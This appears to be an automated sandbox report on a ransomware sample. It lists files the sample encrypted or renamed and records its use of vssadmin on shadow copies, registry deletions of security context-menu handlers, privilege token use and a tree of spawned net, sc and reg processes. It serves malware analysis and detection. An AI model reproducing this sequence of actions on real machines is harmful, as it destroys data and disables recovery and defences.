File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200_contrast-high.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\msipc.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_40x40x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_BAAAAAQAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5671_20x20x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-HK.respack C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_32x32x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Square44x44Logo.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_CgAAAAoAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_SaveAutomatically_LTR_Phone.mp4 C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\LargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MgAAADIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileLargeSquare.scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-48.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2060 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 1064 wrote to memory of 1192 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 1192 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 512 wrote to memory of 3580 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 512 wrote to memory of 3580 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 924 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 924 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2080 wrote to memory of 4044 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2080 wrote to memory of 4044 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 4020 wrote to memory of 3416 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4020 wrote to memory of 3416 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 3216 wrote to memory of 2448 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3216 wrote to memory of 2448 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2836 wrote to memory of 2380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2836 wrote to memory of 2380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 1060 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1060 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2060 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2176 wrote to memory of 3156 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2176 wrote to memory of 3156 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
